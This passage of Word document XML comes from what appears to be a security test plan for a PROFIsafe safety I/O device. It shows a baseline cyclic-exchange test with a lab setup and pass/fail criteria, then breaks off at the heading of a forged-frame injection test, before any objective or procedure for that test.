      <w:tr w:rsidR="00635873" w:rsidRPr="00316EA1" w14:paraId="59EA9CD3"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6B53FE" w14:textId="43A2C62D" w:rsidR="00635873" w:rsidRDefault="005905A3" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C8232FA" w14:textId="082D4DCF" w:rsidR="00635873" w:rsidRPr="003306B2" w:rsidRDefault="006D3E1C"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3E1C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Baseline (no attack)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3E1C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C527E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">reference for the connecting </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3E1C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635873" w14:paraId="1B15EF41"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188F3C2C" w14:textId="718F4EBC" w:rsidR="00635873" w:rsidRDefault="005905A3" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A041E94" w14:textId="66231887" w:rsidR="00635873" w:rsidRPr="003306B2" w:rsidRDefault="006D3E1C"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3E1C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1 (Requirements-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005905A3" w:rsidRPr="00316EA1" w14:paraId="7475427A"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63BBC81" w14:textId="03A188D5" w:rsidR="005905A3" w:rsidRDefault="005905A3" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CBB9CA4" w14:textId="5EEADDEC" w:rsidR="005905A3" w:rsidRPr="003306B2" w:rsidRDefault="008F6A43"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F6A43">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that, with a correctly configured F_Dest_Add and valid CRC, the F-Device exchanges cyclic safety data, sets qualifier = good, and drives outputs per the control byte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005905A3" w:rsidRPr="00316EA1" w14:paraId="2E56FB41"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7A967B1F" w14:textId="3FEB6418" w:rsidR="005905A3" w:rsidRDefault="00557B41" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="084DD868" w14:textId="77777777" w:rsidR="00CF2F7C" w:rsidRDefault="00CF2F7C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF2F7C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure F-Host with F_Dest_Add matching the DUT address. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B1348A" w14:textId="77777777" w:rsidR="00CF2F7C" w:rsidRDefault="00CF2F7C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF2F7C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Establish PROFIsafe connection; reach OPERATE. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7349F7E1" w14:textId="77777777" w:rsidR="00112FBC" w:rsidRDefault="00CF2F7C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF2F7C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Toggle a safe input and a safe output via the F-Host. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79FE5D87" w14:textId="41BCB9A9" w:rsidR="005905A3" w:rsidRPr="00CF2F7C" w:rsidRDefault="00CF2F7C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF2F7C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Record process data, qualifiers, and CRC over ≥ 60 s.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005905A3" w:rsidRPr="00316EA1" w14:paraId="0F9F5A65"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F1C627" w14:textId="6CE658CC" w:rsidR="005905A3" w:rsidRDefault="00557B41" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C27DAB3" w14:textId="489DC7E9" w:rsidR="009C3E99" w:rsidRDefault="00141F8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41F84">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS </w:t>
            </w:r>
            <w:r w:rsidR="00112FBC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:r w:rsidRPr="00141F84">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">qualifier = good throughout, outputs mirror the commanded control byte, and no passivation occurs under nominal conditions. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B4BA255" w14:textId="29F9CCCF" w:rsidR="005905A3" w:rsidRPr="003306B2" w:rsidRDefault="00141F8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41F84">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">FAIL </w:t>
            </w:r>
            <w:r w:rsidR="00112FBC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:r w:rsidRPr="00141F84">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>qualifier=bad, or output/command mismatch.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="301E877A" w14:textId="77777777" w:rsidR="00184056" w:rsidRDefault="00184056" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF67C1F" w14:textId="1966C518" w:rsidR="00DF51C0" w:rsidRDefault="00DB074F" w:rsidP="00DF51C0">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r w:rsidR="00DF51C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concrete Execution </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Gitternetztabelle5dunkelAkzent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1551"/>
        <w:gridCol w:w="7737"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF51C0" w14:paraId="66362D5A" w14:textId="77777777" w:rsidTr="00622E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149C9F" w14:textId="77777777" w:rsidR="00DF51C0" w:rsidRDefault="00DF51C0" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78C98668" w14:textId="77777777" w:rsidR="00DF51C0" w:rsidRDefault="00DF51C0"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DF51C0" w14:paraId="1D4D3C2E"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76D35A" w14:textId="28525FFB" w:rsidR="00DF51C0" w:rsidRDefault="00ED175D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3496EEA0" w14:textId="77777777" w:rsidR="00DF51C0" w:rsidRPr="002A51F8" w:rsidRDefault="00DF51C0" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002A51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t>TC-RQ001-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w:rsidRPr="00316EA1" w14:paraId="7634001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370A7233" w14:textId="3320394C" w:rsidR="00DF51C0" w:rsidRDefault="00E634DC" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="015E2AA8" w14:textId="77777777" w:rsidR="00C36F03" w:rsidRPr="002A51F8" w:rsidRDefault="00C36F03"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xml:space="preserve">SPS S7-15xxF 192.168.0.1; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26CBDEED" w14:textId="767BAB0E" w:rsidR="00DF51C0" w:rsidRPr="002A51F8" w:rsidRDefault="00C36F03"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SRIO DUT 192.168.0.2 (F_Dest_Add set via rotary switch, e.g. 007); Laptop mirror NIC (Wireshark, no IP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w:rsidRPr="00316EA1" w14:paraId="1EE3B4D2"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54674" w14:textId="1CA7D6BE" w:rsidR="00DF51C0" w:rsidRDefault="00E634DC" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="339CBBF7" w14:textId="5AA62C0C" w:rsidR="00DF51C0" w:rsidRPr="002A51F8" w:rsidRDefault="003B427D"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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIA Portal (F-Host), Wireshark (filter `pn_rt || pnio)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w:rsidRPr="00316EA1" w14:paraId="4748FA2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209C97B6" w14:textId="6C1476AE" w:rsidR="00DF51C0" w:rsidRDefault="00E634DC" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ABBFF8E" w14:textId="77777777" w:rsidR="003B427D" w:rsidRPr="002A51F8" w:rsidRDefault="003B427D"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xml:space="preserve">(1) Download safety program, set F_Dest_Add=7 in GSD; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757D4AEB" w14:textId="77777777" w:rsidR="003B427D" w:rsidRPr="002A51F8" w:rsidRDefault="003B427D"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xml:space="preserve">(2) PLC→RUN; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193689B3" w14:textId="77777777" w:rsidR="003B427D" w:rsidRPr="002A51F8" w:rsidRDefault="003B427D"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xml:space="preserve">(3) capture on mirror; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1955BD43" w14:textId="77777777" w:rsidR="00622E9C" w:rsidRPr="002A51F8" w:rsidRDefault="003B427D"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xml:space="preserve">(4) force Q bit, observe DO channel; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3274D62B" w14:textId="51432E58" w:rsidR="00DF51C0" w:rsidRPr="002A51F8" w:rsidRDefault="003B427D"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(5) stimulate F-DI, observe input in PLC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w14:paraId="10407916"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57E2C2" w14:textId="5CC10ACE" w:rsidR="00DF51C0" w:rsidRDefault="00C36F03" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BA1FBA9" w14:textId="3A80C3E8" w:rsidR="00DF51C0" w:rsidRPr="002A51F8" w:rsidRDefault="00622E9C" w:rsidP="00C36F0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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail-___</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w:rsidRPr="00316EA1" w14:paraId="075FA4D3"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1471E9AE" w14:textId="40A8E3AA" w:rsidR="00DF51C0" w:rsidRDefault="00C36F03" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AB686D6" w14:textId="107D08F3" w:rsidR="00DF51C0" w:rsidRPr="002A51F8" w:rsidRDefault="00622E9C"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TC01_baseline.pcapng, PLC watch-table screenshot, timestamped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14C91FCC" w14:textId="77777777" w:rsidR="00DC2191" w:rsidRPr="00DB074F" w:rsidRDefault="00DC2191" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D61A55" w14:textId="66577CC8" w:rsidR="00DB074F" w:rsidRPr="00FD6890" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EBCD803" w14:textId="5EACAFAE" w:rsidR="00DB074F" w:rsidRPr="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ001-02 </w:t>
      </w:r>
      <w:r w:rsidR="00105328">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forged / Tampered PROFIsafe Frame Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7E095" w14:textId="7C0FB913" w:rsidR="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1 </w:t>
      </w:r>
      <w:r w:rsidR="00105328">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105328" w14:paraId="536461C1"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1F135D" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F36C65A" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328"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105328" w14:paraId="3BDAC95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071B01" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24A3D2CD" w14:textId="6EF132B6" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB074F">
              <w:t>TC-RQ001-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105328" w14:paraId="1116C5DE"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536B7B74" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D6BF159" w14:textId="2F5916C1" w:rsidR="00105328" w:rsidRPr="003306B2" w:rsidRDefault="0010532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t>RQ-001 → CR 3.1 (+RE1) / CR 1.2 → Asset C, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105328" w14:paraId="6941A4F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B183A8" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02148BBE" w14:textId="6247EC4C" w:rsidR="00105328" w:rsidRPr="003306B2"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Spoofing + Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105328" w14:paraId="7174CBC1"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16630A6E" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7093CEE3" w14:textId="4354367B" w:rsidR="00105328" w:rsidRPr="003306B2" w:rsidRDefault="0077034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70344">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4 (Penetration Testing / protocol manipulation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105328" w:rsidRPr="00316EA1" w14:paraId="06ECA077"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B99D88" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
